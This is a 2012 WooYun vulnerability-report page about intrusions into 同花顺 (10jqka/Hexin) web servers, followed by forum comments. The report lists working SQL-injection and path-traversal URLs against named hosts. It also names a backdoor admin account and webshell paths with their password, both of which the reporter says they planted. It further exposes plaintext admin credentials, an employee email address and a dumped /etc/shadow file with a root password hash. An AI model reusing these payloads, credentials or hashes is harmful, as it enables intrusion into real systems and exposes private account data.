当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05566

漏洞标题:同花顺各种漏洞

相关厂商:同花顺

漏洞作者: _Evil

提交时间:2012-03-26 14:21

修复时间:2012-03-31 14:21

公开时间:2012-03-31 14:21

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-26: 细节已通知厂商并且等待厂商处理中
2012-03-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

曾经向贵站检测许久,现在把贵站安全不足的地方汇报给你们.

详细说明:

http://www.10jqka.com.cn/modules.php?name=Downloads&d_op=viewdownload&cid=44%20and%201=1 注入
http://dl.hexin.cn/admin/index.html
HackerEnd 123456 (我加的账户)贵站这个后台javascript没有最好验证,还有php后台注入
 
http://dl.hexin.cn/admin/mes_admin.php?do=soft_up&id=408%20and%20user%3E0
http://dl.hexin.cn/dlnew/accept_ver_new.php_bak
http://dl.hexin.cn/
http://wapdx.hexin.cn/config/config.ini
http://dl.hexin.cn/admin/index.html
敏感泄露
http://ns2.10jqka.com.cnhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/oday.php
一句话 woainichang 这个上传没验证好
http://t.hexin.cn/download/pas$log.txt
http://t.hexin.cn/phpinfo.php 一句话 woainichang
- -这个是任意下载漏洞呢
http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../../../../../../etc/passwd&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=
http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../global.php&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=
http://t.hexin.cn/dlxhtml/download.php?fn=../download/xx.php&bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1919&mname=WM6.0%E5%8F%8A%E4%BB%A5%E4%B8%8A
http://wapdx.hexin.cn/manager/
admin H10EjXqIkNa
hexin  10HjEqXkIaN   xieguangfu@myhexin.com  
http://mobile.10jqka.com.cn/main/admin/adv_img.php
后台各种
http://210.51.244.176/etc/shadow


root:$1$AnxEGPi8$Upiz.3ZRFVGeS2vj9ny7o/:14680:0:99999:7::: bin:*:14680:0:99999:7::: daemon:*:14680:0:99999:7::: adm:*:14680:0:99999:7::: lp:*:14680:0:99999:7::: sync:*:14680:0:99999:7::: shutdown:*:14680:0:99999:7::: halt:*:14680:0:99999:7::: mail:*:14680:0:99999:7::: news:*:14680:0:99999:7::: uucp:*:14680:0:99999:7::: operator:*:14680:0:99999:7::: games:*:14680:0:99999:7::: gopher:*:14680:0:99999:7::: ftp:*:14680:0:99999:7::: nobody:*:14680:0:99999:7::: vcsa:!!:14680:0:99999:7::: rpc:!!:14680:0:99999:7::: mailnull:!!:14680:0:99999:7::: smmsp:!!:14680:0:99999:7::: nscd:!!:14680:0:99999:7::: pcap:!!:14680:0:99999:7::: ntp:!!:14680:0:99999:7::: dbus:!!:14680:0:99999:7::: avahi:!!:14680:0:99999:7::: xfs:!!:14680:0:99999:7::: rpcuser:!!:14680:0:99999:7::: nfsnobody:!!:14680:0:99999:7::: sshd:!!:14680:0:99999:7::: haldaemon:!!:14680:0:99999:7::: avahi-autoipd:!!:14680:0:99999:7::: sabayon:!!:14680:0:99999:7:::


这个我很无语

http://mobile.10jqka.com.cn/main/dlquery_s.php?bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946&mname=Gpad&tyid=2705
曾经 root 4.x MYSQl版本 没gpc ~


漏洞证明:

自己看看就知道了。

修复方案:

php很多程序都是 2008-2010的安全技术 缺陷很多,请贵站请安全人员去维护吧。有问题联系我邮箱 435420828@qq.com

版权声明:转载请注明来源 _Evil@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-03-31 14:21

厂商回复:

最新状态:

2012-04-17:已更改

漏洞评价:

评论

  1. 2012-03-26 15:34 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    漏洞类型: 成功的入侵事件、求真相

  2. 2012-03-26 18:24 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    不明真相的路人甲...

  3. 2012-03-31 17:34 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    太让我失望了

  4. 2012-03-31 22:49 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @_Evil 现在很多厂商都是无所谓态度 不知道他们私下动作。。。

  5. 2012-06-02 21:03 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser 同花顺 ban了它么

  6. 2012-06-02 21:04 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @大肠 @_Evil 好在漏洞还有一个学习和分享的意义

  7. 2012-06-02 21:05 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser zone社区的帖子能删吗?

  8. 2012-06-02 21:06 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @_Evil 已经帮你处理了,以后多思考 :)

  9. 2012-06-02 21:07 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser 以后手机不敢发了 黑莓8830 看不见代码 我的错 o(╯□╰)o

  10. 2015-05-17 00:08 | 强子 ( 路人 | Rank:0 漏洞数:1 | 入侵,漏洞)

    大神求联系方式